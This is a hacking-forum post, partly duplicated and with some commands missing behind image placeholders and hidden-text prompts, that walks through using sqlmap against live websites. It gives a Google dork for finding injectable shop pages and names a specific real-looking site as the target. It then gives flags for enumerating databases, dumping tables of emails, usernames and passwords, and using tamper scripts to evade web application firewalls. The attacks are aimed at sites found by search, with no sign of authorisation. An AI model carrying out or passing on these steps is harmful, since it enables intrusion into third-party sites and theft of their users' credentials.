melindad74
Multithreading Wizard
Divine
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
200 XP
Basic tutorial of using sqlmap to exploit vulnerable web application
tosql injection
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
1- Sqlmap download and requirements:
SQLmap repository:
Required: python 2.7.*
To get basic sqlmap commands help
You can search for vulnerable website using search engines such as google (best SE).
You'll need just to use a good dork (not included in this tutorial)
I used in this example this dork: (inurl:shop.php?id= site:in) and check websites manually (best way)
Or just use the dork within sqlmap which is not recommanded:
Open website from search result and add to the end of url a quote ' then press enter. If you see on source some error strings like this: "You have an error in your SQL syntax;"
Then the webapplication might be vulnerable. In my example:
3-Exploiting the vulnerability using sqlmap:
Most sqlmap used arguments/comands(recommanded):
My target for now is: http://www.aarsh.co.in/products.php?id=11
So I run this command:
"--is-dba" to check wther the current database use has admin privileges or not and finally "--tamper" we'll discuss later in this tutorial.
You can use "--threads" argument to speed up the pentest (depends on your internet connection).
Image:
(
I couldn't complete the previous step(exploiting) because of some technical problem
I may edit this tutorial later...
But the rest is easy.
)
In the end of tables enumeration results, your targeted tables names should look like: users, members, subscribers...
In the final step: columns enumeration, you may look for emails,passwords, usernames...
so type the commands as below: (-D "db_name" -T "table_name" --columns) to enumerate table columns
Finally it comes the time to fetch data from database database.
Commands: -D "db_name" -T "table_name" -C "column1,column2,column3..." --dump
You can select any column from the table and you may use threads to make the dump faster.(--threads=10)
Tamper scripts are used to obfuscate and escape web app firewalls because there are many firewalls that checks sql queries to defend the webapp from database attacks... I usually use this two tampers: (randomcase.py, randomcomments.py) and each firewall may need a spcial set of tampers, so it depends on the web application. We won't discuss a lot about this cuz it's for advenced users.
To see the full list of tampers that located in "tamper" folder within sqlmap path (you can write your own tamper):
tosql injection
- Content:
- Sqlmap download and requirements
- Gettings sqli vulnerable website
- Exploiting the vulnerability using sqlmap (database,tableand columns enumeration)
- Dump data from database
- Bypass firewalls using tamper scripts
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
1- Sqlmap download and requirements:
SQLmap repository:
You must upgrade your account or reply in the thread to view hidden text.
To get basic sqlmap commands help
2- Gettings sqli vulnerable website:
You can search for vulnerable website using search engines such as google (best SE).
You'll need just to use a good dork (not included in this tutorial)
I used in this example this dork: (inurl:shop.php?id= site:in) and check websites manually (best way)
Or just use the dork within sqlmap which is not recommanded:
Loading…
i.ibb.co
Then the webapplication might be vulnerable. In my example:
Loading…
i.ibb.co
Most sqlmap used arguments/comands(recommanded):
a) - Enumerate server databases:
My target for now is: http://www.aarsh.co.in/products.php?id=11
So I run this command:
I already know that the dbms (database management system) is mysql so I add this "--dbms=MySQL" to command line to escape other dbms payload execution to gain time. Also I set level and risk to 3 for advenced exploiting "--risk=3 --level=3"... "--random-agent" to use a random user agent... "--dbs" to enumerate databases of this server/site if it's vulnerable of course.
"--is-dba" to check wther the current database use has admin privileges or not and finally "--tamper" we'll discuss later in this tutorial.
You can use "--threads" argument to speed up the pentest (depends on your internet connection).
Image:
Loading…
i.ibb.co
I couldn't complete the previous step(exploiting) because of some technical problem
I may edit this tutorial later...
But the rest is easy.
)
c) - Enumerate table columns:
In the end of tables enumeration results, your targeted tables names should look like: users, members, subscribers...
In the final step: columns enumeration, you may look for emails,passwords, usernames...
so type the commands as below: (-D "db_name" -T "table_name" --columns) to enumerate table columns
4- Dump data from database:
Finally it comes the time to fetch data from database database.
Commands: -D "db_name" -T "table_name" -C "column1,column2,column3..." --dump
You can select any column from the table and you may use threads to make the dump faster.(--threads=10)
5- Bypass firewalls using tamper scripts:
Tamper scripts are used to obfuscate and escape web app firewalls because there are many firewalls that checks sql queries to defend the webapp from database attacks... I usually use this two tampers: (randomcase.py, randomcomments.py) and each firewall may need a spcial set of tampers, so it depends on the web application. We won't discuss a lot about this cuz it's for advenced users.
To see the full list of tampers that located in "tamper" folder within sqlmap path (you can write your own tamper):